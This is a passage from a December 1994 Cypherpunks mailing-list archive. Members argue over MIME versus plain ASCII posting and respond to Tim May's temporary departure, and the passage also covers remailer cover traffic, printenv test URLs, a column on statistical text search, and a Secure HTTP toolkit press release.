syndrome, with a codger like me >whose first Net account was in 1972 being a ripe target for the newest >pistoleros with their .486-caliber Linux boxes in their holsters. > >Whatever, I'm fed up. I don't see any cheap shots or personal inuendos. All I see are a lot of folks who like you and wish to help you as you helped them. You have said that you don't want any help. That is your right, but understand that unless you adopt some of the new tools the world will leave you behind. We all have learned a lot from you (at least I have) and we know that the sooner you start seriously using the new stuff the sooner you will help improving it by your _constructive_ criticism. Enjoy your vaccation . -- Lucky Green PGP encrypted mail preferred. From bdolan at use.usit.net Fri Dec 16 00:17:03 1994 From: bdolan at use.usit.net (Brad Dolan) Date: Fri, 16 Dec 94 00:17:03 PST Subject: Tim May the Luddite--His Last Message for A While In-Reply-To: <199412160654.WAA02983@netcom15.netcom.com> Message-ID: FWIW, here's to you, Tim, from another Luddite: I learn and use new tools to the extent I think they make my life better. ASCII still looks good to me. Signal-to-noise ratio on this list has fallen to zero. Arrogance-to-signal ratio is near infinite. Brad On Thu, 15 Dec 1994, Timothy C. May wrote: > > It may be time for me to move on. More than 2 years on this list, > since the B.C. period, may be too long. > > I'm fed up with fighting these battles, and no doubt many of you are > fed up with seeing contentious pitched battles. Cypherpunks is > increasingly a forum of strutting and posturing about who has the most > powerful tools, who is spending more of their lives staying at the > bleeding edge of technology. Depressing. > > The consensus of the active posters in this latest thread (Perry, > Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy, > unwilling to begin posting in the latest modality. > > (Funny, Netnews is still 99.999983% plain ASCII, by message count, and > nobody advocating a more advanced scheme is actually _using_ such ne > plus ultra formats here on this list. If it's so easy, and so 'punkly > correct, why not?) > > Jim McCoy wrote: > > > If you are truly interested in making strong encryption easy and > > transparent to the vast majority of the users of future communications > > systems you should be leading the MIME charge, not holding everyone back... > > I don't care for this imputation that my views on communicating with > the list are somehow holding others back. Or that discussing these > issues is inconsistent with being "truly interested in making strong > encryption easy and transparent." > > Bluntly, I'm fucking sick and tired of these cheap shots and personal > innuendos. Maybe it's the "young guns" syndrome, with a codger like me > whose first Net account was in 1972 being a ripe target for the newest > pistoleros with their .486-caliber Linux boxes in their holsters. > > Whatever, I'm fed up. > > I'm taking a break and unsubbing for a while. If I'm back in time for > the January meeting, we'll have the "Demo Day" as planned. If not, > you'll have to play it by ear. > > As they say, you know what a Cypherpunks firing squad is? > > A circle. > > > --Tim May > > > -- > .......................................................................... > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at netcom.com | anonymous networks, digital pseudonyms, zero > 408-688-5409 | knowledge, reputations, information markets, > W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. > Higher Power: 2^859433 | Public Key: PGP and MailSafe available. > Cypherpunks list: majordomo at toad.com with body message of only: > subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay > > > From lcottrell at popmail.ucsd.edu Fri Dec 16 00:24:06 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Fri, 16 Dec 94 00:24:06 PST Subject: Question for remailer operators Message-ID: >I see about 200 messages a day through my remailer, sizes averaging a >couple of K. I had the impression at one point that the VAST majority of >this was "cover" traffic that someone is generating just to keep the >network busy. I don't know if this is still the case. It might be >possible to opt out of the cover traffic generator to reduce your load >to a politically manageable level. Maybe people generating cover traffic >could estimate how many messages they are generating. > > >Hal I have a script generating covering traffic. It creates a message at random intervals between 1 and 20 min. The messages are encrypted, and padded with cutmarks for all remailers which support that. The messages are sent through six hops. The remailers are chosen from all reasonably reliable remailers on Raph Levine's list (except for those which have asked to be excluded). -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From lcottrell at popmail.ucsd.edu Fri Dec 16 00:24:14 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Fri, 16 Dec 94 00:24:14 PST Subject: Remailers and Keyservers, active ones? Message-ID: >Is there a list of the currently active remailers and key servers? > > >-uni- (Dark) > While I do not remember the URL of the remailer list, it is on my home page. -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From jamesd at netcom.com Fri Dec 16 00:26:18 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 16 Dec 94 00:26:18 PST Subject: MIME is not standardB In-Reply-To: <199412160753.XAA02891@deepthought.pylon.com> Message-ID: Check the alt.binaries groups for MIME compliant binaries. I was not able to find one. In addition, my MIME compliant newsreader was not able to interpret the message formats it did encounter. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From cactus at seabsd.hks.net Fri Dec 16 00:59:32 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Fri, 16 Dec 94 00:59:32 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: <199412160904.EAA13405@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412160709.BAA20011 at pentagon.io.com>, Jim McCoy wrote: >A position to which I still agree on this particular issue. Perhaps not >stated as diplomatically as Perry did, but so be it... No slam on Perry intended (really), but when Perry starts looking diplomatic to you it's time to reassess your communication skills. - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvFYCioZzwIn1bdtAQFX/AF+PI9m17bZahNB3k2TSaxSEiqEQ1vc1KF6 b24I/SpS0CXZV1MbYp8HL/SSIkuh3vUs =93K6 -----END PGP SIGNATURE----- From iijon at iiit.swan.ac.uk Fri Dec 16 01:19:02 1994 From: iijon at iiit.swan.ac.uk (Jon Care) Date: Fri, 16 Dec 94 01:19:02 PST Subject: HTML "printenv" Message-ID: Hi all, A while back, there was mention of a WWW URL that gave back all the details passed between one's client and a server. Can anyone remember the URL? I remember it ended in "printenv" Thanks for the help. -- Jonathan H. Care, i^2it Ltd. -o- PGP public key available. Email: iijon at iiit.swan.ac.uk -o- Tel: +44 1792 295213 Fax:+44 1792 295811 http://www.linux.org.uk/Jon.html -o- My opinions are solely my own. VMS - OS software for the 70's. From mccoy at io.com Fri Dec 16 01:59:21 1994 From: mccoy at io.com (Jim McCoy) Date: Fri, 16 Dec 94 01:59:21 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: <199412160742.CAA12589@bb.hks.net> Message-ID: <199412160959.DAA08158@pentagon.io.com> L. McCarthy writes: > Jim McCoy writes: > > Actually this "dumb flamewar" has produced some good discussion regarding > > actual implementation issues. > > I beg to differ. If you think that was a good discussion, I'd hate to see > what you'd classify as a bad discussion. Crypto relevance was minimal, too. A bad discussion contains very little signal. The crypto relevance to the MIME discussion was quite apparent to me, it is a shame you missed it. For starters the difficulty of advancing technology conducive to CP goals when it runs counter to the inertia of "what I have now works for what I want to do today, so why bother doing something that might just be better in the long run..." Every argument that was used against MIME will one day be used to discourage the widespread use of cryptography. Additionally, MIME is a necessary standard for encapsulating cryptographic messages in a package that can get through some of the stranger transport mechanisms used on the net, it doesn't make much sense to argue over what color to paint the Ferrari when all you have is dirt roads to drive it on... > > Everything that has happened with MIME will happen again when people > > try to add cryptography to the structure of the net. > > It seems to me that people are *already* trying to add cryptography to the > structure of the net, and that would actually be worth discussing. Yeah, like the PGP-MIME draft, which will open up the ability to effectively use PGP to more people than anything the cypherpunks have ever done :) Standards are important and instead of trying to tilt at windmills to no purpose perhaps it is worthwhile to examine how existing standards can be effectively marshaled towards cypherpunk goals. jim From lmccarth at ducie.cs.umass.edu Fri Dec 16 03:23:17 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 16 Dec 94 03:23:17 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: <199412161128.GAA14473@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Jim McCoy writes: > L. McCarthy writes: > > Jim McCoy writes: > > > Actually this "dumb flamewar" has produced some good discussion regarding > > > actual implementation issues. > > I beg to differ. If you think that was a good discussion, I'd hate to see > > what you'd classify as a bad discussion. Crypto relevance was minimal, too. > A bad discussion contains very little signal. Right. We went through dozens of messages to establish that some people like MIME and others don't, just as we did several weeks ago. What a surprise that not much has changed since then. Bleeding wonderful. > The crypto relevance to the MIME discussion was quite apparent to me, > it is a shame you missed it. If it was "quite apparent", it's a shame you didn't make that clearer at the time, rather than claiming it now. I saw plenty of flaming about various people's mailers and net connections. If someone was making points about crypto there, they were doing a damn fine job of hiding it. > Every argument that was used against MIME will one day be > used to discourage the widespread use of cryptography. By this reasoning we should resurrect all the old firestorms about gun control and child pornography. Analogies can be drawn, perhaps, but I don't feel those discussions are appropriate here. > Additionally, MIME > is a necessary standard for encapsulating cryptographic messages in a > package that can get through some of the stranger transport mechanisms used > on the net, Good standards are good. There's a revelation. Yep, we sure needed dozens of messages to rehash that. Right. > > > Everything that has happened with MIME will happen again when people > > > try to add cryptography to the structure of the net. > > It seems to me that people are *already* trying to add cryptography to the > > structure of the net, and that would actually be worth discussing. > Yeah, like the PGP-MIME draft, which will open up the ability to > effectively use PGP to more people than anything the cypherpunks have ever > done :) So why not talk about that instead ? > Standards are important and instead of trying to tilt at > windmills to no purpose perhaps it is worthwhile to examine how existing > standards can be effectively marshaled towards cypherpunk goals. Exactly. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvF4X2f7YYibNzjpAQHmKQQAj9Sn16yJw2p52wH5IDca45MR1LYHAt0b YHndPHHD9ktpOgc4aoOBBnduItNgj6Z0hkuMRIoSB/Zy7P+Q11nMIcZwAiiocqlO /DA8pZ6WNEoZ47dUGX7+PrfJLkecJaxaCeZihFqqUUegaqhLSTRa6oX3QCgtXRfW UD4NMJ/mQu0= =feNH - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvF5uioZzwIn1bdtAQHi4AGAy25SDZwylW/AWgX1YYPMOEb8BHrilE5V a8SlvxhpX0uEAy0HqfjSIlGfTO7+WpBY =Y17/ -----END PGP SIGNATURE----- From danisch at ira.uka.de Fri Dec 16 05:11:15 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Fri, 16 Dec 94 05:11:15 PST Subject: HTML "printenv" Message-ID: <9412161310.AA06727@elysion.iaks.ira.uka.de> > A while back, there was mention of a WWW URL that gave back all the > details passed between one's client and a server. > Can anyone remember the URL? I remember it ended in "printenv" Try these: http://www.mit.edu:8001/machine http://www.uiuc.edu/cgi-bin/printenv Hadmut From rishab at dxm.ernet.in Fri Dec 16 05:37:40 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 16 Dec 94 05:37:40 PST Subject: Processing data, information and knowledge Message-ID: Here's an episode from my column that mentions Architext and NSA's statistical text searching techniques. Try the 'concept search' at hotwired (www.wired.com) or Time Inc's Pathfinder (www.timeinc.com), or look at the demo at Architext - www.atext.com. Rishab --- Electric Dreams Weekly column for The Asian Age by Rishab Aiyer Ghosh #40, 12/December/1994: Processing data, information and knowledge Computers are good at processing data. Juggling numbers, indexing names and addresses, these are the rudimentary tasks upon which much of the world's infrastructure depends. Computers are mediocre at processing information, the layering of data with complex inter-relationships. But they are simply pathetic at handling knowledge, the models based on piles of information used to understand and predict an aspect of the world around us, expressed by humans not in tables and charts, but in articles and books. Computers are organized. They can understand streams of homogeneous inputs, they can follow links between data that are made clear and detailed. This preference for structure makes it somewhat difficult to get computers to process more naturally expressed concepts and knowledge embodied in human-language text. Passing over the entirely academic debate about the ability or otherwise of machines to ever understand human ideas, the fact is that most attempts at getting computers to process or aid in processing such ideas has concentrated on making computers 'artificially intelligent' - making them form their own structured model of relatively unstructured text. Computer systems for natural language processing try to find meaning in a text by translating it into some internal representation, with the aid of a detailed grammar-book far more explicit than most humans could bear. Most natural language processing is either too slow, too inaccurate, or too limited to a particular human language or set of concepts to be practically useful on a large scale. While it may be pretty good for simple voice- based interfaces, NLP is unlikely in the near future to be able to, for instance, quickly go through 2 years of Time magazine and identify the US government's changing policy on the war in Bosnia. While NLP begins with the assumption that machines need some sort of understanding to process text, other methods concentrate more on practical applications. These usually abandon any attempt to search for a structure in textual inputs, and rely instead on identifying a vague pattern. Neural networks, which try to simulate the working of the brain, are frequently used to identify patterns in images, sounds and financial data. Though they are often quite successful at their limited tasks, they are not normally used to process text. One reason for this is perhaps that text either needs to be interpreted in the small chunks of conversation, which requires a knowledge of grammar that conventional NLP provides; the other use for text processing is in organizing huge volumes of it, for which neural networks are too slow. The alternative comes strangely enough from the US National Security Agency. It has always been suspected that the NSA searches through e-mail traffic for 'sensitive' material, which for the large volumes involved would require considerable help from computers. Earlier this year, the agency began soliciting collaborations from business to develop commercial applications of their technique. It claimed to be able to quickly search through large quantities of text, in any language, for similarities to sample documents, and even automatically sort documents according to topics that it identifies. A similar though independently developed system is available from California-based Architext. Though statistical techniques for text processing are not entirely new, the continuing development in the area is a sign of the growing use of computers as knowledge- processing aids. By identifying patterns more-or-less blindly, without any attempt at understanding the concepts they represent, they can help us make some sense of the ocean of information that otherwise threatens to swamp us. Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in). --====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====-- This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in) --==================================================================-- From perry at imsi.com Fri Dec 16 06:25:43 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 16 Dec 94 06:25:43 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412160338.TAA26446@netcom10.netcom.com> Message-ID: <9412161424.AA02172@snark.imsi.com> Timothy C. May says: > My issue has not been with MIME as a transport mechanism, but > non-ASCII content, which clearly most folks can't read. Far from clear, Tim. Last time I checked, almost no one I communicated with regularly was using a machine without a pixmapped display. That means that all standing in the way of them being able to read non-ascii is the right font sitting on disk, and a program that groks it. Perry From rishab at dxm.ernet.in Fri Dec 16 06:50:21 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 16 Dec 94 06:50:21 PST Subject: Mr Anonymous' ignorance and 10 threads Message-ID: Mr. Anonymous the Anti-Mime should be very embarassed indeed: > I think the point Tim is making is that at the current time, our lives > are not made easier or enriched by "MIME". If I want point and click > spreadsheet opening, I can use other systems that have worked for 5 > years or more, with apps that are already configured and easier to use. Mr. Anonymous seems to believe that MIME is a way to associate documents with apps so that they start up on double-click! :-D I don't really understand the need for such a huge 10% thread (SNR 1:10) on MIME of all things (with most of it concentrating on transmitting pictures and using dumb terminals). I have my own domain name and access the Net at 24+ kbps from multiple platforms all capable of running MIME, but I don't post in MIME. I agree with Tim that it's only rarely that MIME could add value to posts on this list. When MIME readers do PGP nicely, then it would be something for Cypherpunks to scream about. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From perry at imsi.com Fri Dec 16 07:00:18 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 16 Dec 94 07:00:18 PST Subject: Amanda and MIME In-Reply-To: <199412160714.XAA12540@jobe.shell.portal.com> Message-ID: <9412161500.AA02233@snark.imsi.com> anonymous-remailer at shell.portal.com says: > I think if we only use MIME, the quality of discussion on the list > would skyrocket. Eric, you should block all non-MIME posts to the > list. How could we have been so blind? The anonymous poster should feel happy he's anonymous, as his posting is embarassingly stupid. Perhaps he'd like to make fun of ASCII next by posting his next message as sequences of octal digits. Perry From JLICQUIA at mhc.uiuc.edu Fri Dec 16 07:54:33 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Fri, 16 Dec 94 07:54:33 PST Subject: MIME, VT100, SLIP, TIA, And All That Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Allow me to inject a "phenomenology of access" to the raging blaze... I am sitting, at the moment, at a 486DX2/66 running Win 3.1 and PC/TCP. The Ethernet on this thing is connected (somewhere) to a fiber link which is itself connected to some serious bandwidth (I believe multiple T3s are involved). This is an on-site job I'm doing for my company which is in the process of wrapping up, so soon I'll be returning to my regular workplace. It's running a small net, with a Linux box routing mail via UUCP and SLIP (depending if someone's decided to pull SLIP up). We have to use net tools directly on the Linux box; our other computers (various types and operating systems, all high-powered) have no ability to access the world except through mail and the limited feed we can afford. Finally, as this list is high-bandwidth, my boss has told me to use a different account for 'punks. That is a local freenet account, no shell access, no TIA. (And before you ask: I do volunteer work for the freenet, and I know that there are *legal*, not technical, reasons why things like TIA will never be allowed.) I must use this through dialup; I have pine (no elm, no mailx, no mh, no X tools, etc.). With SLIP, I can POP my mail somewhere else; I'm getting ready to set up so I can do this from work, but it's running into bandwidth problems. There is no local SLIP provider that provides to home users. Thus, I am trapped in a VT100 environment, where a shell would be a great luxury. If and when I get SLIP, I'll have to do it on a 386SX/20 with 4M of RAM, not exactly your speed demon kind of machine. Many of the people I've talked to, and have convinced that crypto is a Good Thing(tm), are complete newbies. They might have a Prairienet account, they might not. Most of them are a bit intimidated by PGP, especially when I start talking to them about the hassles necessary to get PGP to work with dialup mail. And I can't blame them; I've yet to get a good setup running which will allow me to PGP-ize at home through my dialup, even with Linux running on my poor beast of burden. My point? Actually, I've got a few: 1. While I, too, have experienced the head rush that comes with fully graphical interfaces to high-bandwidth Net, I am also painfully aware of the reality that too many people are stuck with less. Given a few weeks, I may be one of them, and the prospects of this may be enough to cause me to, regretfully, follow Tim in his exodus from the list. (Forget the problem of signing!) 2. MIME (the standard) causes my heart to flutter. It is a wonderful standard. The implications are simply staggering, and for more than just crypto. I yearn for the day when Joe Average User can experience Amanda's MIME utopia in the comforts of his/her own home. It will, however, be a while before this can become a reality. Perhaps in California, where there are POPs every few blocks, it seems silly to suggest that we limit ourselves to the failings of the VT100; out here in central Illinois, however, where just establishing a single POP is an exercise in frustration (you don't want to know how I know this), the VT100 is here to stay for a long time. 3. I note with sadness the loss of one of our top propagandists ;-) over this issue. I respected his ability to see beyond the glitter of the possible into the cold darkness of the available, especially considering his comparative riches access- and hardware-wise. The issues he raised about MIME, he did from a personal standpoint, but he also was able to speak for many who don't have such great access. Noting the treatment he was given ("you don't fuckin' know what you're talking about"), I also wonder about my own fate when I am deprived of my own connectivity riches; considering that technical reasons alone just might necessitate my exit from the list, my resolve to stay might be undermined by the prospect of a list devoted to a technological elitism rather than a practical and grassroots effort to promote cryptography on all fronts, whether "technologically challenged" or not. Tim, I've CCed this to you, frankly, in the hopes that you'll come back soon. Not all of us think your middle name is Ludd. Happy vacation! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvG3XTER5KvPRd0NAQEUDAP8D0e78hsqgHT8HPWZZTH3HJ6t80muA+cQ lRcL1hVVlPGLBrQWiuwlVTf5qCbL+oRKXSK5njce5hcLEayzgFfFXW4NpmS28qHq 1NBcdfSB8YfNmMUWSw2g78hDkZqAKuS2PUFr8x6L/BfbJYrLVvtHXEjWsb28cF3j zGCaDSDZ0ac= =4q7K -----END PGP SIGNATURE----- From jeff at firefly.prairienet.org Fri Dec 16 08:06:20 1994 From: jeff at firefly.prairienet.org (Jeff Young) Date: Fri, 16 Dec 94 08:06:20 PST Subject: the whole list Message-ID: I would like to be added to the list From nobody at myriad.pc.cc.cmu.edu Fri Dec 16 08:12:45 1994 From: nobody at myriad.pc.cc.cmu.edu (Anonymous) Date: Fri, 16 Dec 94 08:12:45 PST Subject: SecureWeb Message-ID: We'll just see.... =========Begin forwarded message========= >Date: Fri, 16 Dec 94 07:51:27 -0800 >From: more at newsmaster.tgc.com >To: SQUEAL at eek.eek.com >Subject: 4989 Web Security Toolkits Available Late December from Terisa >Systems Dec. 16 > >Web Security Toolkits Available Late December from Terisa Systems Dec. 16 >SUPERHIGHWAY REPORT HPCwire >============================================================================= > >A news release from Terisa Systems and SPRY -- > > Washington, D.C. -- Terisa Systems has announced that its SecureWeb >Toolkits for World Wide Web transaction security will be available later >this month. > > The company also said that CyberCash Inc., Open Market Inc., O'Reilly & >Associates, SPRY Inc., Spyglass Inc. and Verity Inc. will be the first >companies to use the toolkits to build Web servers or clients with security >features. > > Terisa Systems was launched earlier this year by RSA Data Security Inc. >(RSA) and Enterprise Integration Technologies Corp. (EIT). The company's >toolkits provide an implementation of Secure HTTP (HyperText Transfer >Protocol) for commercial products. Secure HTTP (S-HTTP), which was developed >by EIT, is a security-enhanced version of the World Wide Web's internal >communications language. > > David Pool, president of SPRY, said S-HTTP will be incorporated into the >company's Internet software -- Internet In A Box, the AIR Series and AIR >Mosaic Express -- in the first quarter of 1995. Consumers using Internet In >A Box will be able to purchase products safely over the Internet with a >credit card. In addition, companies or publishers using the AIR Series and >AIR Mosaic Express can market, sell and support their products. Pool said, >"Currently, the Internet is a vast, untapped marketplace still lacking >security and payment services. However, the S-HTTP protocol addresses both >encryption and authentication making electronic commerce a reality for our >customers." > > According to Douglas Colbeth, president of Spyglass, his company will offer >S-HTTP as a module in its Enhanced Mosaic Security Framework, making Mosaic >suitable for applications requiring confidentiality and authentication. >Enhanced Mosaic is the commercial version of NCSA Mosaic, the popular World >Wide Web browser from the National Center for Supercomputing Applications at >the University of Illinois. Colbeth said, "Our customers see the huge >potential in commerce on the Internet, but are very concerned about security. >An industrial strength solution such as Secure HTTP will let Mosaic handle >a wide range of applications requiring uncompromising security." > > At O'Reilly, Dale Dougherty, publisher for the Digital Media Group, said >S-HTTP will be used for a secure version of the GNN Direct service, that >allows subscribers to order from publishers or advertisers who market and >sell products over GNN Direct. He said, "We've been looking for a security >solution that will allow our subscribers to order safely online. Secure HTTP >provides the capabilities needed for our GNN service." > > Concerning plans of other licensees, CyberCash will use the technology to >provide a system for safe electronic payments over the Internet and Open >Market, a developer of electronic commerce solutions, plans to sell a Web >server that incorporates S-HTTP. Verity is introducing Verity Mosaic, a >Mosaic client offering user authentication and secure communications for use >with Verity's Topic Information Server for the World Wide Web, also announced >today. > > SecureWeb Toolkits include an implementation of EIT's Secure HTTP, which >ensures the authenticity of transactions and the confidentiality of >information exchanged via the World Wide Web. With a secure HTTP-enabled >application, users and information providers can encrypt and sign messages >and other material digitally. Binding agreements are possible because >communications are secret and tamper-proof and cannot be repudiated. > > SecureWeb kits incorporate RSA public key cryptography technology to permit >spontaneous, secure communications between unfamiliar correspondents. >SecureWeb also supports other cryptography systems such as traditional shared >password and Kerberos. A SecureWeb run-time license is required; run-time >license pricing is volume-based. Toolkits will be available on a limited >basis in December 1994. > > Additional information on Terisa Systems is available at URL >http://www.terisa.com. Those interested can also send e-mail to >infoterisa.com or telephone 415/617-1836. Additional information on Secure >HTTP is available by sending email to . > > For more information, contact Deanna Leung of SPRY, Inc. at 206/442-8231 >or email her at: , or contact Nancy Teater of Terisa Systems >at 415/321-0252, or email her at: . > >***************************************************************************** > H P C w i r e S P O N S O R S > Product specifications and company information in this section are > available to both subscribers and non-subscribers. > > 900) Ampex 915) Genias Software 905) Maximum Strategy > 912) Avalon Computer 930) HNSX Supercomputers 906) nCUBE > 921) Cray Research Inc. 902) IBM Corp. 932) Portland Group > 907) Digital Equipment 904) Intel SSD 935) Silicon Graphics > 909) Fujitsu America 916) MasPar Computer *931) Sony Corporation > > *Updated information within last 30 days >***************************************************************************** >Copyright 1994 HPCwire. >To receive the weekly HPCwire at no charge, send e-mail without text to >"trial at hpcwire.tgc.com". ==========end forwarded message========== ==================Thomas Jefferson================== The strongest reason for the people to retain their right to keep and bear arms is, as a last resort, to protect themselves against tyranny in government. ==================================================== _/_/_/ _/_/_/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/_/_/ _/ _/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/ From rsalz at osf.org Fri Dec 16 08:12:51 1994 From: rsalz at osf.org (Rich Salz) Date: Fri, 16 Dec 94 08:12:51 PST Subject: Kaufman/Eastlake DNS changes Message-ID: <9412161608.AA03398@sulphur.osf.org> You should probably drop a line to Paul Vixie, vixie at vix.com, the current maintainer of BIND. Tell him I sent you... As a side note, it's too bad that Digital seems to have lost all of their crypto-folks. The only one left is John Wray; at least he's good. /r$ From nsyfrig at wppost.depaul.edu Fri Dec 16 08:38:29 1994 From: nsyfrig at wppost.depaul.edu (nsyfrig at wppost.depaul.edu) Date: Fri, 16 Dec 94 08:38:29 PST Subject: Hey Martha! It's "The Invasion from Outer First Virtual" -rated Y (for Y-not) Message-ID: eric at remailer.net (Eric Hughes) wrote (among other things): Regardless of the security, users need to understand what it gives them. This is orthogonal to the choice of security, as well as to the persistence of thick-headedness in society. _________________(non-automatic divider line)___________________ I believe this is definitely a proverbial nail, and it has just been hit where it counts! Some evangelizing, education, and teamwork is definitely in order here. As implied, it doesn't just apply to the virtual world, but the real one as well. From xpat at vm1.spcs.umn.edu Fri Dec 16 08:50:59 1994 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Fri, 16 Dec 94 08:50:59 PST Subject: Low power/bandwidth machines Message-ID: <9412161650.AA08136@toad.com> "JEFF LICQUIA (CEI)" writes: >this from work, but it's running into bandwidth problems. There is no >local SLIP provider that provides to home users. Thus, I am trapped in >a VT100 environment, where a shell would be a great luxury. If and whe >I get SLIP, I'll have to do it on a 386SX/20 with 4M of RAM, not exactl >your speed demon kind of machine. >1. While I, too, have experienced the head rush that comes with fully >graphical interfaces to high-bandwidth Net, I am also painfully aware o >the reality that too many people are stuck with less. Given a few week, If you have access to a SLIP line, but frustrated with perhaps less of a machine than you would like, give MINUET a try. It is a DOS based tool designed for students with cheap/old computers so they can access the Internet. It includes embedded POPmail, news, ftp, telnet, ping etc. It is available anonymous FTP from boombox.micro.umn.edu /pub/pc/minuet/beta16/minuarc.exe or /pub/pc/minuet/shaky/minuarc.exe <--beta17 SLIP software that goes with it is at /pub/pc/slip/latest/sliparc.exe The beta17 has caused no problems for me yet. Beta17 has some performance advantages. A 386 should be no problem at all. --------------------------------------------------------------- P M Dierking xpat at vm1.spcs.umn.edu From amanda at intercon.com Fri Dec 16 08:55:02 1994 From: amanda at intercon.com (Amanda Walker) Date: Fri, 16 Dec 94 08:55:02 PST Subject: Tim May the Luddite--His Last Message for A While Message-ID: <9412161155.AA56102@chaos.intercon.com> > The consensus of the active posters in this latest thread (Perry, > Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy, > unwilling to begin posting in the latest modality. Actually, that's not my feeling at all. I haven't (at least intentionally) been making or intending to make the kinds of "get with the program" remarks that Lucky, Perry, and some other have been. I've just been trying to explain why I think that MIME isn't necessarily bunk. There is a middle ground between "the one true way" and "utter crap," after all, and I found your assertions that MIME was useless to be just as annoying as assertions that it's a panacea. I'm not telling you (or anyone else) to use MIME. Even I don't use the fancy features MIME for most of my off-site email, especially mailing lists, for exactly the reasons you describe. I'm just tired of people deciding the because they're not able to take advatange of something, that it is therefore useless. That's all I've been intending to complain about, and I'm sorry if I've come across more strongly. I certainly don't want to chase you off the list. You're one of the people I take pains to read, even on high-volume email days... > Bluntly, I'm fucking sick and tired of these cheap shots and > personal innuendos. Maybe it's the "young guns" syndrome, with a > codger like me whose first Net account was in 1972 being a ripe target > for the newest pistoleros with their .486-caliber Linux boxes in > their holsters. Well, I came onto the net after the NCP/TCP flag day, so you've got some seniority on me, but I'm hardly a young gun, and I hate Intel processors and UNIX :). I started in the spring of 1982 on a VAX 11/780 with real live DEC VT100s, and an ADDS Viewpoint on a 1200 baud modem (at the time, this was really fast) in my dorm room. I was just awful to come back from a week's vacation and spend a whole hour catching up with Usenet--and that was before you could unsubscribe to individual groups :). To a large degree, it's this dozen years of experience with the net that makes me optimistic about things like encryption, MIME, and so on. Every time the baseline moves up, people complain. It happened moving from NCP to TCP/IP. It happened when moving from A News to B News (my site was actually an A News holdout for a long time). It happened when net.* got broken up into a set of hierarchies (alt.* is a remarkably long-lived fragment of that changeover), and it's happening now with things like PGP & MIME. Plus ca change, plus c'est la meme chose. Part of the cypherpunks mission, as I understand it, is to help to keep moving that baseline, concentrating on one particular direction (privacy). I'll stop posting on side issues if it will help keep the focus on privacy, and help keep folks like you from giving up in frustration. After all, cypherpunks is far from the only soapbox I subscribe to :). Amanda Walker InterCon Systems Corporation From harveyrj at vt.edu Fri Dec 16 09:21:43 